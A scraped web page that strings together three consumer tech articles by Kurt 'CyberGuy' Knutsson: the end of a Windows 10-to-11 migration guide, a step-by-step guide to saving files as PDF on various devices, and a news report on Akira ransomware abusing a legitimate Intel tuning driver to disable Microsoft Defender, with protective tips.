    MICROSOFT AUTHENTICATOR IS DELETING YOUR PASSWORDS

    A person typing on a laptop

    Experts recommend backing up your files to an external hard drive or a cloud service before making the switch. (Kurt “CyberGuy” Knutsson)

    How long the process takes

    Upgrading to a new computer isn’t instant, but knowing the timeline helps you plan your day. On average, you can expect the transition to take most of an afternoon. Here’s what it looks like step by step:

    Choose and order your new PC: Browsing, comparing models and making the purchase usually takes one to two hours.

    Initial setup and Windows updates: When the new computer arrives, the first startup and applying all current Windows updates can take another one to two hours.

    Install key programs: Installing Microsoft Office apps and Adobe Acrobat typically requires about one hour, depending on download speed and license activation.

    Back up data on your old PC: Creating backups of your documents, photos and email accounts usually takes one to three hours. The exact time depends on how much data you have and whether you use an external drive or the cloud.

    Transfer data and settings: Moving files, Outlook .pst backups and Windows settings to the new computer often takes one to two hours.

    Verify that everything works: Allow about an hour to test your programs, check your email and contacts, and confirm that none of your files were left behind.

    Reconnect devices and tweak settings: Finally, plan for 30 to 60 minutes to reconnect printers, set up Bluetooth accessories and customize your desktop and preferences.

    When you add it all together, the full migration can take anywhere from six to ten hours spread over a day. While it requires patience, completing each step carefully ensures that your new Windows 11 computer runs smoothly without losing important data.

    Pro tip: Once your new PC is ready, don’t forget security. Install strong antivirus software right away. The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android & iOS devices at Cyberguy.com/LockUpYourTech 

    What to do with your old PC

    Once you’ve finished moving everything over to your new Windows 11 computer and confirmed it’s working, don’t forget about your old PC. Leaving files on it could expose your personal data if the computer is ever donated, recycled or resold.

    Before repurposing, always perform a secure wipe to erase all personal information. This step ensures that sensitive files, passwords and documents can’t be recovered later. After wiping, you can safely recycle the device, donate it or set it up for light use elsewhere in your home.

    For step-by-step instructions, check out how to securely get rid of your old computer before recycling, selling or donating it.  

    CLICK HERE TO GET THE FOX NEWS APP

    What if you’re not ready to upgrade?

    Not everyone wants to switch right away. The good news is that Microsoft recently added two ways to extend Windows 10 support until October 13, 2026.

    • Use Microsoft Rewards: Redeem 1,000 points to keep your Windows 10 system covered.
    • Back up with OneDrive: Sync your files through Windows Backup and get extended support for free.

    These options buy you more time, but remember: Windows 11 is the future. Planning now ensures you won’t be caught off guard when the final end date arrives.

    Take my quiz: How safe is your online security?

    Think your devices and data are truly protected? Take this quick quiz to see where your digital habits stand. From passwords to Wi-Fi settings, you’ll get a personalized breakdown of what you’re doing right — and what needs improvement. Take my Quiz here: Cyberguy.com/Quiz

    Kurt’s key takeaways

    Upgrading from Windows 10 to Windows 11 may feel overwhelming, but it doesn’t have to be. With the right preparation, backups and tools, you can make the switch smoothly and protect everything that matters.

    Are you ready to upgrade before Windows 10 support runs out, or will you risk sticking with an outdated system? Let us know by writing to us at Cyberguy.com/Contact

    Sign up for my FREE CyberGuy Report
    Get my best tech tips, urgent security alerts, and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide — free when you join my CYBERGUY.COM/NEWSLETTER

    Copyright 2025 CyberGuy.com.  All rights reserved.

    Kurt “CyberGuy” Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News & FOX Business beginning mornings on “FOX & Friends.” Got a tech question? Get Kurt’s free CyberGuy Newsletter, share your voice, a story idea or comment at CyberGuy.com.

    [ad_2]

    Source link

  • How to save any file as a PDF

    [ad_1]

    NEWYou can now listen to Fox News articles!

    Portable Document Format (PDF) is one of the most widely used file formats for storing and sharing documents. It makes sense since PDFs are a universal file format that maintains layout, fonts, colors and images regardless of the device used to read them. Many people use PDFs to send resumes, receipts, tickets, contracts and school papers because they ensure the documents will look the same regardless of who opens them.

    Furthermore, unlike proprietary formats, such as docx, xlsx and pptx, they are less likely to disappear. They’re also one of the easiest files to secure and encrypt in case you’re sending sensitive information.

    The best part? You can turn just about any text document or image into a PDF. Let’s look at some popular ways of doing this.

    Sign up for my FREE CyberGuy Report
    Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CyberGuy.com newsletter.

    Kurt Knutsson explains how to save any file as a PDF. (REUTERS/Hannah Beier)

    Save files as PDF on desktop

    If you’re using a Windows or Mac, there is a built-in option that allows you to save a file as a PDF with a few clicks. This method usually works on files like text documents, images and emails.

    GET UP TO 83% OFF LIFETIME LICENSES FOR ACROBAT CLASSIC AND MICROSOFT OFFICE PROFESSIONAL

    Windows

    You can use the print function in many Windows apps to save a file as a PDF.

    • Open the file in its default app.
    • Click File > Print, click the printer icon or press Ctrl + P.
    • In the print dialog window, select Microsoft Print to PDF in the Printer dropdown menu.
    • Click Print.
    A step-by-step guide shows how to save a file as a PDF.

    Windows offers a built-in way to save a file as a PDF. (Kurt “CyberGuy” Knutsson)

    Mac

    Like Windows, many macOS apps allow you to save files as PDF when printing them.

    • Open the file in its default app.
    • Click File > Print, click the printer icon or press Command + P.
    • In the print dialog window, click PDF in the bottom left corner and choose where to save it.
    • Click Save.

    Chromebook

    Whether you are viewing a document, image or webpage (even in an Android app), as long as the app you’ve opened it in supports printing, you can save it as a PDF.

    • Open the file.
    • Click File > Print, click the printer icon or press Ctrl + P.
    • In the print dialog window, select Save as PDF in the Destination dropdown menu for selecting printers.
    • Click Save.

    Save files as PDF on mobile

    On Android and iPhones, you can exploit the share function to save files as PDFs. It also only takes a few taps.

    Android

    There are several ways to export a file as a PDF on Android, with the easiest option being the print function when sharing it.

    Settings may vary depending on your Android phone’s manufacturer. 

    • Open the file in the default app.
    • Tap the Share icon.
    • Tap Print.
    • Tap the PDF button to download it.

    iPhone

    On iPhone, you can save a file as a PDF in apps like Photos, Files and Notes. Here are the general steps:

    • Open the file.
    • Tap the Share icon.
    • Tap Print to see a PDF preview of the file.
    • Tap the Share icon.
    • Tap Save to Files.
    • Then, tap “Save” in the upper-right corner of the screen.
    A step-by-step guide shows how to save a file as a PDF.

    You can save a file as a PDF on your iPhone or Android. (Kurt “CyberGuy” Knutsson)

    Save a file as a PDF on apps and cloud services

    Many apps and online services offer built-in tools to convert files to PDF format, whether you’re using popular office suites or cloud-based services. Let’s look at the options available on various platforms.

    If you’re using Microsoft Office apps, such as Word, Excel and PowerPoint, you can just save the file as a PDF.

    • Open the file.
    • Click File > Save As.
    • Under the location where the PDF will be saved, set the file type dropdown to PDF.
    • Click Save.
    A step-by-step guide shows how to save a file as a PDF.

    Follow these steps to save a document as PDF in Microsoft Word. (Kurt “CyberGuy” Knutsson)

    For Google Workspace apps, such as Docs, Sheets and Slides, you can download them as a PDF:

    • Open the file.
    • Click File 
    • Then tap Download,
    • Next, click the PDF Document.

    If you want to save a webpage in browsers like Chrome, Edge and Firefox, follow the steps below:

    • Open the web page.
    • Click the three-dot icon or three-line icon in the top-right corner.
    • Click Print.
    A step-by-step guide shows how to save a file as a PDF.

    Even a webpage can be saved and exported as a PDF file. (Kurt “CyberGuy” Knutsson)

    • Set Printer or Destination to Save as PDF.
    • Click Save.
    A step-by-step guide shows how to save a file as a PDF.

    Follow these steps to save a document as PDF in the Edge internet browser. (Kurt “CyberGuy” Knutsson)

    In Adobe Acrobat Reader, follow the steps below (keep in mind that you need a premium subscription to use this feature):

    • Open the file in Adobe Acrobat Reader. It will automatically be converted to a PDF.
    • Press Ctrl + S on Windows or Command + S on Mac to save the PDF.

    Notetakers like Evernote, OneNote and Notion also allow you to export files as a PDF. For instance, in Notion, you have to do it this way:

    • Click the three-dot icon in the top-right corner.
    • Click Export.
    • Select PDF in the Export format dropdown.
    • Click Export.

    WINDOWS 11 FLAW LETS HACKERS BYPASS SECURE BOOT PROTECTIONS

    Convert a file to a PDF online

    You can convert files to PDF using online conversion tools. To convert a file into a PDF using CloudConvert, follow the steps below:

    • Go to https://cloudconvert.com/
    • Click Select File.
    • Select the file you want to convert on your computer or phone.
    • Select PDF in the Convert to dropdown. You can upload more than one file.
    • Click Convert.
    • Click Download.

    While these sites provide a convenient means of converting files to PDFs, it’s best to avoid uploading sensitive documents like tax returns, medical records, financial statements, legal contracts or personal identification documents. That’s because they may store copies of those files on their servers, which means they can become vulnerable to security breaches or unauthorized access. For these, use built-in tools or trusted apps (any of the ones mentioned above will do).

    Save physical documents as PDF files

    You will find many apps for scanning documents and saving them as a PDF on Android and iPhone. The best one often mentioned is Adobe Scan, which you can download on the App Store or Google Play.

    Here’s how to use it.

    • Open the Adobe Scan.
    • If it’s your first time opening it, you will need to sign in with your Apple (iPhone only), Google or Facebook account.
    • Tap the white circle in the bottom center of the screen to scan the document.
    • Tap Save PDF in the bottom right corner.

    Working with PDFs

    Once you’ve saved your file as a PDF, you may want to perform various actions to make it more useful or secure. Here’s how to work with your PDF files effectively.

    Merging PDFs

    You can use online tools to merge PDFs for free.

    • On your computer, go to https://acrobat.adobe.com/link/acrobat/combine-pdf.
    • Drag and drop the PDFs you want to merge into the browser window.
    A step-by-step guide shows how to save a file as a PDF.

    Adobe’s website offers a free method to combine PDF files. (Kurt “CyberGuy” Knutsson)

    • You can rearrange the PDFs by dragging them to the position you want them to be in.
    • Click Combine in the top-right corner.
    A step-by-step guide shows how to save a file as a PDF.

    The Adobe website makes it possible to combine PDFs and arrange them in any order. (Kurt “CyberGuy” Knutsson)

    Shrinking PDFs

    Adobe also has an online tool you can freely use to compress PDFs.

    • On your computer, go to https://www.adobe.com/acrobat/online/compress-pdf.html.
    • Drag and drop the PDF you want to compress into the browser window.
    • Click Compress in the bottom-right corner.

    Protecting your PDFs with a password

    You can also password-protect your PDFs for free on the Adobe website using the steps below.

    • On your computer, go to https://acrobat.adobe.com/link/acrobat/protect-pdf.
    • Drag and drop the PDF you want to compress into the browser window.
    • Enter the password under Set password. Enter the same password under Confirm password.
    • Click Set password in the bottom-right corner.
    A step-by-step guide shows how to save a file as a PDF.

    You can protect a PDF with a password on the Adobe website. (Kurt “CyberGuy” Knutsson)

    Sign PDFs

    There are plenty of ways to sign a document, and the easiest one is to use Adobe Acrobat Reader.

    • Open the PDF in Adobe Acrobat Reader on your computer.
    • Select the E-sign tab.
    • Click Add signature or Add initials in the FILL AND SIGN YOURSELF section in the menu on the left.
    • Type your signature or initials in the dialog window. You can also draw it if you have a graphics tablet or add an image of it. Just switch to the Draw or Image tab.
    • Click Apply.
    • In the toolbar on the left side of the document area, click the pen icon.
    • Select your signature or initials in the menu that appears on the right.
    • Place your cursor, which will now look like your signature or initials, where you want to sign and click to insert the signature.

    CLICK HERE TO GET THE FOX NEWS APP

    Kurt’s key takeaways

    As you can see, saving any file as a PDF is easy regardless of your device or platform. It takes just a few clicks or taps. Use PDFs when you want to share documents without losing their formatting elements. Remember to follow best practices when sharing them, especially if they contain sensitive information. You can always add an extra layer of security by password-protecting or encrypting your PDFs.

    What other format do you like converting files to for storing and sharing? Let us know by writing to us at CyberGuy.com.

    Sign up for my FREE CyberGuy Report
    Get my best tech tips, urgent security alerts and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CyberGuy.com newsletter.

    Copyright 2025 CyberGuy.com.  All rights reserved.

    Kurt “CyberGuy” Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News & FOX Business beginning mornings on “FOX & Friends.” Got a tech question? Get Kurt’s free CyberGuy Newsletter, share your voice, a story idea or comment at CyberGuy.com.

    [ad_2]

    Source link

  • Hackers found a way to turn off Windows Defender remotely

    [ad_1]

    NEWYou can now listen to Fox News articles!

    Most modern Windows PCs rely on Microsoft Defender as their first line of defense against malware. Over the years, it has evolved into a capable and often underrated antivirus that blocks a wide range of threats. But a hacker group has found a way to abuse a legitimate Intel CPU tuning driver in a “Bring Your Own Vulnerable Driver” (BYOVD) attack to completely disable Microsoft Defender.

    The technique has been observed since mid-July 2025 and is already being used in active ransomware campaigns. The method doesn’t rely on exploiting a software bug or delivering an obviously malicious file. Instead, it takes advantage of how the Windows driver system is designed to allow deep hardware access.

    Let’s discuss all you need to know about the attack and how you can stay safe.

    HOW SCAMMERS TARGET YOU EVEN WITHOUT SOCIAL MEDIA

    Sign up for my FREE CyberGuy Report
    Get my best tech tips, urgent security alerts, and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter.

    The Akira ransomware group exploits a legitimate Intel CPU tuning driver in cyberattacks to completely disable Microsoft Defender on Windows systems. (Kurt “CyberGuy” Knutsson)

    How Akira ransomware disables Microsoft Defender

    The Akira ransomware group has developed a new way to bypass security tools by using a legitimate Intel CPU tuning driver called rwdrv.sys from the performance-tweaking tool ThrottleStop. Security firm GuidePoint Security says attackers load this driver to gain kernel-level access to Windows systems, then install a second malicious driver, hlpdrv.sys, which changes the DisableAntiSpyware registry setting via regedit.exe to shut down Microsoft Defender.

    Once Defender is disabled, attackers can run other malicious programs undetected. GuidePoint says this method has been consistently spotted in Akira campaigns since mid-July.

    A Windows PC

    The Akira ransomware group has been infiltrating Windows operating systems by exploiting a legitimate driver to gain access. (Kurt “CyberGuy” Knutsson)

    Akira ransomware targets Microsoft Defender and SonicWall VPNs

    The same group has also been linked to attacks targeting SonicWall VPN devices. SonicWall has stated that these incidents likely involve a known vulnerability, CVE-2024-40766, rather than a brand-new zero-day. The company recommends restricting VPN access, enabling multi-factor authentication, and disabling unused accounts as immediate defenses.

    Akira attacks often involve stealing data, setting up hidden remote access, and deploying ransomware to encrypt files across an organization. Security experts warn that fake or lookalike websites are increasingly being used to distribute these malicious tools.

    FBI WARNS SENIORS ABOUT BILLION-DOLLAR SCAM DRAINING RETIREMENT FUNDS, EXPERT SAYS AI DRIVING IT

    Researchers at GuidePoint have published a YARA detection rule, along with file names, service names, SHA-256 hashes, and file paths to help identify this activity. They recommend administrators actively monitor for these indicators, apply filtering and blocking rules as new IoCs emerge, and only download software from official or verified sources.

    We reached out to Microsoft for a comment, but did not hear back before our deadline.

    A split image shows a hacker and a Windows laptop.

    Antivirus software, two-factor authentication and data removal services are just a few ways Windows users can protect themselves from hackers. (Cyberguy.com)

    6 ways to protect yourself against Akira ransomware and similar threats

    The Microsoft Defender attack is smart and dangerous, but you’re not without defenses. Here are a few tips to help you stay safe:

    1) Use strong antivirus software

    Even with regular updates, Windows systems can be left exposed if built-in defenses are disabled. A strong antivirus software with real-time protection, kernel-level monitoring, and frequent updates can provide backup security. The best way to safeguard yourself from malicious links that install malware, potentially accessing your private information, is to have strong antivirus software installed on all your devices. This protection can also alert you to phishing emails and ransomware scams, keeping your personal information and digital assets safe.

    Get my picks for the best 2025 antivirus protection winners for your Windows, Mac, Android & iOS devices at CyberGuy.com.

    2) Limit exposure

    Many exploits rely on user interaction, such as clicking a shady link, downloading a compromised file, or mounting an untrusted virtual disk. Stick to reputable websites, avoid opening unsolicited email attachments, and use a browser with built-in security features (like Microsoft Edge or Chrome with Safe Browsing enabled).

    3) Avoid running unexpected commands

    Never paste or run commands (like PowerShell scripts) you don’t understand or that were copied from random websites. Attackers often trick users into unknowingly running malware this way.

    GOOGLE CONFIRMS DATA STOLEN IN BREACH BY KNOWN HACKER GROUP

    4) Keep your software updated

    Regularly update your operating system, browsers, and all software applications. Updates often include patches for security vulnerabilities that malware can exploit.

    5) Use two-factor authentication (2FA)

    Enable 2FA on all your accounts. This adds an extra layer of security by requiring a second form of verification, making it harder for attackers to gain access even if they have your password.

    6) Invest in personal data removal services

    Even with strong device security, your personal information may still be exposed online through data brokers and people-finder sites.

    While no service can guarantee the complete removal of your data from the internet, a data removal service is really a smart choice.  They aren’t cheap – and neither is your privacy.  These services do all the work for you by actively monitoring and systematically erasing your personal information from hundreds of websites.  It’s what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet.  By limiting the information available, you reduce the risk of scammers cross-referencing data from breaches with information they might find on the dark web, making it harder for them to target you.

    Check out my top picks for data removal services and get a free scan to find out if your personal information is already out on the web by visiting Cyberguy.com.

    Get a free scan to find out if your personal information is already out on the web: Cyberguy.com.

    CLICK HERE TO GET THE FOX NEWS APP

    Kurt’s key takeaway

    Akira’s trick shows a bigger flaw in how Windows trusts certain tools. A driver meant for harmless CPU tuning ends up being the key to turning security off. Since it’s from a legitimate source, Windows just lets it through without asking questions. We tend to think hackers always break in from the outside. Here, they’re already inside the circle of trust, using the system’s own rules.

    Should Microsoft be doing more to stop ransomware groups from disabling Defender? Let us know by writing to us at Cyberguy.com.

    Sign up for my FREE CyberGuy Report
    Get my best tech tips, urgent security alerts, and exclusive deals delivered straight to your inbox. Plus, you’ll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter.

    Copyright 2025 CyberGuy.com.  All rights reserved.

    Kurt “CyberGuy” Knutsson is an award-winning tech journalist who has a deep love of technology, gear and gadgets that make life better with his contributions for Fox News & FOX Business beginning mornings on “FOX & Friends.” Got a tech question? Get Kurt’s free CyberGuy Newsletter, share your voice, a story idea or comment at CyberGuy.com.

    [ad_2]

    Source link